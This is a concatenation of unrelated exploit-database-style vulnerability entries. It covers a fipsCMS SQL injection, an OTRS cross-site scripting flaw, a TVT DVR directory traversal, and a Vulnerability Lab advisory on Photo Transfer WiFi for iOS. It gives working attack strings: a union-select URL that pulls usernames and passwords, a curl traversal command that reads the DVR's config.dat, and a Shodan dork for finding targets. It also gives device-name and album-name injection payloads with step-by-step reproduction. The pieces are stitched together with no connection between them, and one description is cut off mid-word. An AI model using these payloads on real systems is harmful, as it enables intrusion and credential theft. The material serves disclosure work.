source: http://www.securityfocus.com/bid/23850/info

fipsCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

fipsCMS 2.1 and prior versions are vulnerable to this issue.

http://www.example.com/home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9/**/from/**/pidRoot/**/

source: http://www.securityfocus.com/bid/23862/info

OTRS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This issue affects OTRS 2.0.4; other versions may also be affected.

http://www.example.com/server/otre/index/pl?Action=AgentTicketMailbox&Subaction=[xss]

# Exploit Title: TVT TD-2308SS-B DVR directory traversal

# Shodan Dork: "Cross Web Server"

# Date: 01 Dec 2013

# Disclosure date: 10 Sep 2013

# Exploit Author: Cesar Neira

# Vendor Homepage: http://en.tvt.net.cn/

# Affected Firmware Versions:

3.1.43.B

3.1.43.P

3.1.6.P-1.0.2.1-03

3.1.75.B-1.0.2.1-00

3.1.7.B-1.0.2.1-00

3.1.81.B-1.0.2.1-00

3.1.83.B-1.0.2.1-00

3.1.83.P-1.0.4.2-03

3.1.87.P-1.0.4.2-17

3.1.91.P-1.0.2.1-03

3.1.92.P-1.0.2.1-00

3.1.93.B-1.0.2.1-17

3.2.0.B-1.0.2.1-17

3.2.0.P-1.0.2.1-03

3.2.0.P-1.0.2.1-17

3.2.0.P-1.0.6.0.32-00

3.2.0.P-3520A-00

3.2.0.P-3520A-03

3.2.0.P-3531-00

3.2.0.P-3531-11

3.2.0.P-FH-00

3.2.9.P-3520A-06

maybe others.

# Tested on: TVT DVR TD-2308SS-B

# CVE : CVE-2013-6023

# References:

http://www.kb.cert.org/vuls/id/785838

http://alguienenlafisi.blogspot.com/2013/10/dvr-tvt-directory-traversal.html

POC:

curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings

--

Cesar Neira <csar.1603@gmail.com>

http://alguienenlafisi.blogspot.com

Root-Node

Exploit: http://www.exploit-db.com/sploits/29959.nse

Document Title:

===============

Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities

References (Source):

====================

http://www.vulnerability-lab.com/get_content.php?id=1153

Release Date:

=============

2013-12-02

Vulnerability Laboratory ID (VL-ID):

====================================

1153

Common Vulnerability Scoring System:

====================================

9.1

Product & Service Introduction:

===============================

nsfer WiFi app is a straight and effortless way to transfer your photos and videos between iPhones, iPads

and computers. Forget about hassle with transferring your media via iTunes, iCloud. Features:

- Send photos and videos from iPhone or iPod Touch to other iPhone with a simple drag and drop

- Transfer media from your PC or Mac to iPhone or iPod Touch

- Download photos and videos to your Computer from iPhone, iPod Touch, iPad and iPad Mini

- Copy photos and videos from Computer to iPad or iPad Mini

- Import HD videos to iPad or iPad Mini from iPhone

- Exchange photos and videos between iPads over your local WiFi network

- Make your pictures accessible from your iPhone or iPod Touch to other users on the same WiFi network

- Share you media files on iPad or iPad Mini

- Browse photos and videos shared on iDevices from any PC or Mac

- Download shared media to your Computer

- Receive photos and videos to iPhone or iPod Touch from iPad

- Preview shared photos and videos in any browser

- Use browser to download shared photos and videos from iDevices

- Send photos and videos from any browser to your iPhone or iPad

(Copy of the Homepage: https://itunes.apple.com/en/app/photo-transfer-wifi-quickly/id674978018 )

Abstract Advisory Information:

==============================

The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Photo Transfer WiFi v1.4.4 for apple iOS.

Vulnerability Disclosure Timeline:

==================================

2013-12-02: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

=================

Published

Affected Product(s):

====================

Simplex Solutions Inc

Product: Photo Transfer WiFi 1.4.4

Exploitation Technique:

=======================

Remote

Severity Level:

===============

Critical

Technical Details & Description:

================================

1.1

2 local command/path injection web vulnerabilities has been discovered in the Simplex Solutions Inc Photo Transfer WiFi v1.4.4 for apple iOS.

The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.

The vulnerability is located in the in the device name value of the index and sub category list module. Local attackers are

able to inject own script codes as iOS device name. The execute of the injected script code occurs in 2 different section with

persistent attack vector. The first section is the wifi app interface login were the application is listed. The secound execute

occurs after the login in the smallheader interface section.The security risk of the command/path inject vulnerabilities are

estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.2(+)|(-)7.3.

Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access

and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific

commands or unauthorized path requests.

Vulnerable Application(s):

[+] Photo Transfer Wifi v1.4.4

Vulnerable Parameter(s):

[+] devicename

Affected Module(s):

[+] Login - Device Name

[+] Index - Device Name

1.2

A persistent input validation web vulnerability has been discovered in the Simplex Solutions Inc Photo Transfer WiFi v1.4.4 for apple iOS.

The validation web vulnerability allows remote attackers to inject own malicious script codes by a persistent (application-side) attack vector.

The persistent input validation vulnerability is located in the album name value of the mobile application. Remote attackers and local low

privileged user accounts can inject own malicious persistent script codes as album name. The execute occurs in the main index album name list

and the sub category list. By exchange of the information the issue can be exploited by remote attackers by a low user interaction sync.

The security risk of the persistent vulnerabilities are estimated as medium(+) with a cvss (common vulnerability scoring system) count of 4.6(+).

Exploitation of the persistent web vulnerability requires no or a local low privileged mobile application account and low user interaction.

Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks,

persistent phishing or persistent module context manipulation.

Vulnerable Application(s):

[+] Photo Transfer Wifi v1.4.4

Vulnerable Parameter(s):

[+] albumname

Affected Module(s):

[+] Index - Album Name List

Proof of Concept (PoC):

=======================

1.1

The local command/path inject web vulnerability via devicename value can be exploited by local low privileged or restricted device

user accounts & no user interaction. For security demonstration or to reproduce the command/path mobile app vulnerability follow

the provided information and steps below.

Manual steps to exploit the vulnerability ...

1. Install the photo transfer wifi iOS mobile application

2. Open the iOS settings and switch to the info > device name input

3. Include your name and the payload to execute an app command or request a local device path (">%20<x src=\..\<../var/mobile/Library/[APP PATH]/">)

4. Save the input and open the photo transfer wifi app

Note: After the startup the web-server is available

5. Open the url following url to the web interface of the mobile application (http://localhost:8080)

6. The first execute occurs in the error message with the devicename value of the login

7. Successful reproduce of the first vulnerability done ... let us watch now the secound issue of the devicename after the login

8. Exclude in the iOS device settings the payload, save and open the service via web-server http request

9. Login to the interface with the default username

10. The execute of the command or path request occurs after the login in the devicename value

11. Successful reproduce of the secound vulnerability done!

PoC: Login > devicepreview - devicename

<div class="errormessage">

Invalid password. Try again!

</div>

<div class="youconnect">

You are now connecting to

</div>

<div class="devicepreview">

<div class="devicepreviewInternal">

<p class="devicename">

device bkm>"<<>"<x src="login_incorrect_files/">%20<x src=\..\<../var/mobile/Library/[APP PATH]/">

</p>

<div class='deviceico'>

<img src="/devices_ico/iPadB.png">

</div>

</div>

</div>

<form method="POST" action="/login">

<div class='forminputs'>

<input type="password" name="password" class='passinput' placeholder='Enter Password' id="login_input">

<input type="submit" value="Connect" class='passsubmit'>

</div>

</form>

Note: The injected command or path request execute occurs in the login and error message module.

PoC: Index - smallheader > devicename

<body>

<div class="smallheader">

<img src="web/logo_small.png" style="float:left">

<div class="devicepreview" style="float:right">

<div class="devicepreviewInternal">

<p class="devicename">

device bkm ">%20<x src=\..\<../var/mobile/Library/[APP PATH]/>

</p>

<div class="deviceico">

<img src="/devices_ico/iPadB.png">

</div>

</div>

</div>

</div>

Note: The secound inject/execute is located after the login in the `smallheader` class were the devicename will be visible.

Reference(s):

http://localhost:8080/

1.2

The persistent input validation web vulnerability can be exploited by remote attackers with low privileged web-application user account

and low user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.

Manual steps to reproduce the vulnerability ...

1. Install the photo transfer wifi mobile app

2. Open the iOS photo app (default software)

3. Add a new album and inject into the album name your own script code (payload)

4. Open the photo transfer wifi mobile app

5. Go to the local web-server url (localhost:8080)

Note: After the login to the interface the index displays an album name listing

6. The script code execute occurs with persistent attack vector in the index album name list context

7. Successful reproduce of the vulnerability done!

PoC: Gallery > Album - albumtitle

<div class="albumtitle">

<><[PERSISTENT INJECTED SCRIPT CODE IN ALBUM NAME VALUE VIA POST METHOD INJECT!]>

</div>

<div class="albumsize">

3 Items

</div>

</a><div class="ziploaddiv"><a href="http://localhost:8080/gallery/album/?albumtitle=WallpapersHD&

album=assets-library%3A%2F%2Fgroup%2F%3Fid%3DC44B3062-3A67-4BFA-AF16-04CC8DE2CD29&partial=0" class="interceptme">

</a><a href="http://192.168.2.106:8080/gallery/zip_album/WallpapersHD.zip?album=assets-library%3A%2F%2Fgroup%2F%3Fid%3DC44B3062-

3A67-4BFA-AF16-04CC8DE2CD29" class="zipload" target="_blank">

<img src="localhost8080_files/download.png" class="ziploadimg" width="36px">

</a>

<div class="ziploadtext">

</div>

</div>

</div>

Note: The issue can be exploited by local privileged user accounts in the iOS photo app (default) or by a remote attacker via album to file sync.

(interceptme!? ;)

Reference(s):

http://localhost:8080/gallery/album/?albumtitle=[ALBUM-NAME]

Solution - Fix & Patch:

=======================

1.1

The command/path inject web vulnerabilities can be patched by a secure encode and parse of the devicename value.

Parse the devicename in the login section and in the smallheader class to devicename.

1.2

The persistent input validation web vulnerability can be patched by a secure parse and encode of the album name value.

All GET requests with the value and the input by sync needs to be filtered by a secure mechanism.

Security Risk:

==============

1.1

The security risk of the local command/path inject web vulnerabilities are estimated as high.

1.2

The security risk of the persistent album name web vulnerability is estimated as medium(+).

Credits & Authors:

==================

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:

=========================

The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,

either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-

Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business

profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some

states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation

may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases

or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com

Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com

Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com

Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.

Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other

media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and

other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),

modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]

--

VULNERABILITY LABORATORY RESEARCH TEAM

DOMAIN: www.vulnerability-lab.com

CONTACT: research@vulnerability-lab.com